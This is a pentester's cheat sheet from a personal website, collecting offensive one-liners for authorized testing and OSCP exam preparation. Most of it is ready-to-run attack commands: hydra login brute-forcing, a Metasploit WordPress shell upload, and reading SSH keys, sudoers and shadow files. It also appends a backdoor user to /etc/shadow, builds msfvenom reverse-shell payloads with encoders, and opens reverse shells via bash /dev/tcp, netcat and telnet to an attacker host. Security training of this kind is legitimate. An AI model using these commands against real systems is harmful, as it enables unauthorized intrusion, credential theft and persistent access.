Pentester's Arsenal :: Zaur Molotnikov :: Software Robustness and Security

Here are some useful one-liners and links for pentesters. I have collected these commands to be used right away without spending time on remembering the syntax of a particular tool.

These time saver come handy in a time limited pentest or during your OSCP exam.

Disclaimer On this web site you might read about or get access to various kinds of software and technology, including but not limited to libraries, operating systems, software for communications, mobile phones and tablets, Android software and Linux, even cars and motorcycles, security and penetration testing software, software used in security research and forensics, some samples of software which can be used (elsewhere) for malicious or illegal purposes. You will read about or be provided with the ways to change it, to operate it and to use it. You might find advice and recommendations, which are only an opinion, and not a legal advice or commercial recommendation..
Bear in mind, please, that everything you do, you do solely at your own risk and responsibility. In no way the author of this web site, information, graphics and other materials presented here or related to it can be made liable or anyhow else responsible for your own actions as well as actions of any third party and their direct or indirect results or consequences with or without the use of this information as well as the software, technology and systems mentioned and/or presented here, no matter if developed by the author or by any third party.
In no way it is guaranteed that you will meet any suitability for any particular purpose, safety, security, legality or even simply functioning of the software and systems described here. You have to make sure each time yourself, whether what you do, is really what you intend to do, and that you are ready to be yourself responsible for. All the recommendations and experiences described here are the opinions of corresponding authors and are to be taken with care and own full responsibility.
The software provided on or through this web site, linked to from this web site or anyhow else related to this web site is provided by the corresponding authors on their own terms. We provide all the software here as is without any guarantees to you. You are responsible for deciding whether it is suitable for you or not. You are also responsible for all direct or indirect consequences of using this software.
Other web sites linked to from the current one are out of the author's control, we can not guarantee anything about their content, its quality or even legality. We can not be liable for any use of the linked to web sites or of the information presented there.
We reasonably try to keep this website running smoothly and to deliver information to the best of our knowledge corresponding to the state of the art at the times when the information is composed, usually presented together with the information, and out of good intents. We can not however guarantee and can not be liable for this website being temporarily or permanently unavailable, presenting unreliable information or software, or any other similar or not malfunctioning or functioning not up to your expectations as well as any consequences which might result from this site's operation.

Do not run these commands unless you understand exactly what you are doing!

It is illegal to access like this the machines you are not legally authorized to pentest!

I assume Kali Linux and Bash below. I also assume that the target is on the 192.168.2.0/24 network. Please, double-check the address you target before runing commands from here!

These commands might be and often are dangerous! You are alone responsible for any direct or indirect consequences of using them! Please, do not use them unless you fully understand the consequences and are ready to deal with them, also legally. If you disagree, please, leave this site immediately.

OSINT

web-hunter

Crawls Google and Bing to find emails, subdomains and links: web-hunter.

Bruteforcing

HTTP form bruteforcing


hydra 192.168.2.1 http-form-post "/login.php:login=^USER^&password=^PASS^&par=val:Wrong password" -l root -P rockyou.txt -t 10 -v
hydra 192.168.2.1 http-form-post "/index/login.asp:password=^PASS^&username=^USER^&submit=Enter:Username" -L users.txt -P /usr/share/wordlists/rockyou.txt -t 5 -vvv

Patator

Power-tool when other tools do not fit the purpose: Patator.

Network enumeration

Ping sweep in shell


for i in `seq 1 10`; do (ping -n  -c 1 192.168.2.$i | grep "from" | cut -f4 -d" " | tr -d ":") &  done;

Ping sweep nmap

nmap -sn 192.168.2.1-10
nmap -sn -oG ping.sweep.res.txt 192.168.2.1-10 # grep-friendly output

Port scan nmap


nmap -p 80 -iL host.list.txt -oG web.servers.list.txt # takes hosts from the list

Scanning all ports (-p-) with nmap quickly (-T5):

nmap -p- -T5 192.168.2.2

Scanning quickly some, 25 in this case, top ports (ports used often):

nmap -T5 --top-ports=25

netdiscover

This program asks arp and identifies hosts quickly. If the range is not given, many networks get scanned.

Make sure you use the -i interface switch on a multi-NIC Kali.

netdiscover -i eth1 -r 192.168.2.0/24

Passive scan avoids detection

netdiscover -p  -i eth1 -r 192.168.2.0/24

Arp

Another way to detect host passively is to check the arp table already built:

arp

Arp-scan is an advanced arp tool with many capabilities. One of the easy ways to scan local network with it would be:

arp-scan --interface eth1 --localnet

Tcpdump

sudo tcpdump -i wlan0 -s0 port 110 -w pop3.mail.ru.pcap # s0 = whole packet tcpdump -nXAvvv -r pop3.mail.ru.pcap # read the capture

Web Server Enumeration

Dirbuster

dirb http://$tgt

HTTP enum nmap


nmap -vvv --script http-enum.nse --script-args http-enum.basepath='/' 192.168.2.1

Nikto tools


nikto -host 192.168.0.190

Services Enumeration

OS and software version detection with nmap


nmap -iL active.web.servers.txt -sV -O

SMTP Enumeration


Python script: https://molotnikov.de/scripts/smtpenum.txt

SNMP Enumeration


onesixtyone -c communities.txt -i ips.txt # ip addresses
snmpcheck -t 192.168.2.1 # -t target host, see man
# getmib.py prints mib code, see other -communities in the file linked above

snmpwalk -c public -v1 192.168.2.1 ‘./getmib.py users‘
snmpwalk -c public -v1 192.168.2.1 ‘./getmib.py software‘

SMB Enumeration

Using smbclient to -L list services without -N password:

smbclient -N -L \192.168.0.2

Nbtscan, enum4linux, nmap to scan SMB are below:


nbtscan 192.168.2.1-254 # host names and other smb info
enum4linux -a 192.168.2.1 # enumerates users, machines, names, shares, policies
nmap -p139,445 --script smb-enum-users -iL smb.servers.list.txt # get users
nmap -p139,445 --script smb-check-vulns --script-args=unsafe=1 -v -iL
smb.servers.list.txt # finding vulnerabilities

on a newer nmap these scripts work instead:
    smb-vuln-conficker
    smb-vuln-cve2009-3103
    smb-vuln-ms06-025
    smb-vuln-ms07-029
    smb-vuln-regsvc-dos
    smb-vuln-ms08-067
 - no additional args are needed

Shares and OS discovery over SMB


nmap -v --script smb-enum-shares.nse -p445 -iL smb.servers.list.txt # smb shares
nmap -v -p139,445 --script smb-os-discovery.nse -iL smb.servers.list.txt # smb os discovery

DNS Enumeration

DNS Server Version

nmap -sSU -p 53 --script dns-nsid $tgt

Zone Transfers


host -t ns domain.name # gives dns-server
host -t axfr domain.name dns-server # makes zone transfer
dig axfr @dns-server domain.name
dnsrecon -t axfr -d megacorpone.com
d=$1; for ns in $(host -t NS $d | cut -f4 -d" ");
do host -l $d $ns | grep "has addr"; done

Wordpress

wpscan -u 192.168.2.1
wpscan --enumerate users -u http://192.168.2.1/wordpress/


# Upload shell with metasploit:
# run 'msfconsole' first then
  use exploit/unix/webapp/wp_admin_shell_upload
  set rhost 192.168.2.1
  set targeturi wordpress
  set username admin
  set password admin
  run

Yertle tool


git clone https://github.com/n00py/WPForce.git
# alternative link: https://github.com/qutorial/WPForce
cd WPForce
# test give logins and passwords
python wpforce.py -i usr.txt -w pass.txt -u "http://192.168.2.1/wordpress/"
# then get a shell, it is limited, use metasploit or
# this article better: https://molotnikov.de/wordpress
python yertle.py -u "admin" -p "admin" -t "http://192.168.2.1/wordpress/"

Searching exploits


searchsploit the-app-you-discovered

Docker

Escalating from docker group to root:
https://github.com/chrisfosterelli/dockerrootplease
https://github.com/qutorial/dockerrootplease

Post-exploitation enumeration

Enumerating a Linux machine

http://pentestmonkey.net/tools/unix-privesc-check


unix-privesc-check standard | grep WARNING

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

General enumeration


cat /etc/*-release  #OS version
uname -a

rpm -q kernel

cat ~/.*history #recent commands

find / -perm -o w -type d 2>/dev/null # world-writable folders
find / -perm -4000 -user root 2> /dev/null # suid binaries

egrep '[0-9a-z]{32,32}' -R . 2>/dev/null # searching regexp, flag

grep "root" * -R | less
grep "pass" * -R | less
tail /etc/passwd # list last users, usually human accounts
su username # - afterwards, works when sudo is not there sometimes

cat /etc/sudoers # getting sudoers
cat /etc/sudoers.d/*

cat ~/.ssh/* # ssh keys
cat /home/*/.ssh/* # ssh keys of others
id # check your groups and their privileges

# add a user "user" with password "123"
echo "user:$6$7heg3R.G$l2H7Sqi1WCWVy.wzyxcyoMi0fL3/q87ssRIwxNovJjFriuc4hbpagcrAegubexgSJA06vvnL41XdeLILDoKBM0:17415:0:99999:7:::" >> /etc/shadow

# lists commands current user may run as root
sudo -l

Check history and log of administrative tools, e.g. mongo:


cat ~/.dbshell
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.sh_history
- (Get-PSReadlineOption).HistorySavePath
type C:\Users\username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Running commands from other commands


# tar
touch foo.bar
sudo tar -cf foo.tar foo.bar --checkpoint-action=exec=/bin/bash --checkpoint=1

# zip
touch foo.bar
sudo zip foo.zip foo.bar --test --unzip-command="sh -c /bin/bash"

# vi
:sh
:!Command

Vulnerability scanning


#Try nmap scripts, maybe even all of them :) 

nmap --script all 127.0.0.1

Defect scanning

Sqlmap

Sqlmap searches for SQLi defects.

Exploiting and Exploits Engineering

Albatar

An advanced SQLi exploitation tool: Albatar.

Patterns


PATH=$PATH:/usr/share/metasploit-framework/tools/exploit/
pattern_offset.rb 12345678 # EIP value

pattern_create.rb 2700 # bytes to generate

nasm_shell.rb # generates opcodes

    	mov eax, esp 	# 89E0
  	inc eax		# 40
  	jmp esp		# FFE4
  	push esp	# 54
  	retn		# C3
  	call esp	# FFD4

Generating payloads


#list payloads
msfvenom --list payloads

#metasploit, payload + options, encoder + options
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 10

# add some nops 90 before the shikata ga nai decoder
 format of the exploit: -f [c|python|bash|ruby|...]   see msfvenom --help-formats
 executable formats: -f [exe|elf|msi|psh]
 --smallest will generate the smallest possible payload
 --platform windows | linux
 -a x86 | x64  # architecture

# an example for SL Mail
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.32.199 LPORT=443 EXITFUNC=thread -f c -e x86/
shikata_ga_nai -b "\x00\x0a\x0d"

Immunity debugger and mona script


!mona modules # check NX and ASLR disabled
!mona find -s "\xff\xe4" -m abc.dll

Shells

Spawning a shell - makes your remote shell more usable

python -c 'import pty; pty.spawn("/bin/sh")' perl —e 'exec "/bin/sh";'

Various shells


http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Reverse shell with bash and redirects

bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1

Reverse shell Node JS server


https://github.com/evilpacket/
https://github.com/ajinabraham/Node.Js-Security-Course/nodejsshell.py

Generating reverse shell payloads

https://netsec.ws/?p=331 msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -f elf > shell

Handling it in metasploit:

use exploit multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set lhost $attacher_ip
set lport $attacker_port
run

Shell with Ncat with SSL and IP Filter

ncat --ssl -nlvp 443 --allow 192.168.1.2 # listen ncat --ssl 192.168.1.1 443 -c "cmd.exe" # connect

Shell with telnet

nc -lvp 4444 # attacker's machine, for input nc -lvp 4445 # attacker's machine, for output telnet [atackers ip] 4444 | /bin/sh | [local ip] 4445 # On the targets system. Use the attackers IP!

mknod shell

mknod backpipe p && nc [attackers ip] 443 0backpipe nc -nlvp 443 # on the attacker's machine

Serving Payloads

One line servers


python -m SimpleHTTPServer 8080
python -m pyftpdlib -w -d . -V -p 2121 # write in current folder activated!
python -m CGIHTTPServer # executes scripts in ./cgi-bin/ , sample script
upload.py - simple uploading site, can be served or simply run!

More one-liner servers here: https://gist.github.com/willurd/5720255.

Cross Pasting

cat << EOF > res.txt
> code
> more code
> EOF
enter

ZSSH - file transfers in ssh shell

# to download a file
root@target: sz file.txt
# to upload Ctrl-Space, then
zssh > sz file.txt

SSH tunneling

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip] ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port

Open Remotely port 80 of 127.0.0.1 on port 8080 on Remote server 192.168.1.7:

ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port

SSH dynamic forwarding

ssh -D 127.0.0.1:9050 -N [username]@[ip] proxychains ifconfig

SSH Audit

ssh-audit.py host https://github.com/arthepsy/ssh-audit

Password cracking

A large list of password recovery tools:
http://securityxploded.com/password-recovery-tools.php
Calling john from metasploit for NTLM cracks:
https://www.offensive-security.com/metasploit-unleashed/john-ripper/

CEWL - building word lists

cewl -d 0 -m 5 -w mylist.txt https://en.wikipedia.org/wiki/Someting
# this will make a list of words of at least 5 characters and save it. Depth = 0 - links are not followed.
diff --new-line-format="" --unchanged-line-format="" <(sort mylist.txt) <(sort wikipedia.langs.lst) | grep -iv "wiki" | uniq
# removing the wikipedia words and languages listed
List of languages on Wikipedia: wikipedia.langs.lst

John - mutate the word list

john -wordlist:words.txt -rules:Wordlist -stdout >> passwords.txt
See the Wordlist rules list in /etc/john/john.conf from [List.Rules:Wordlist] line

CrackStation

This website https://crackstation.net/ will crack some kinds of hashes for you online.

Nice links


 * Mach larger arsenal: https://github.com/lanjelot/kb  my fork: https://github.com/qutorial/kb
 * Pentest wiki: https://github.com/nixawk/pentest-wiki my fork: https://github.com/qutorial/pentest-wiki
 * Hacking tutorials: https://github.com/carpedm20/awesome-hacking
 * Linux enumeration by g0tm1lk: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

Last update: 26/10/2020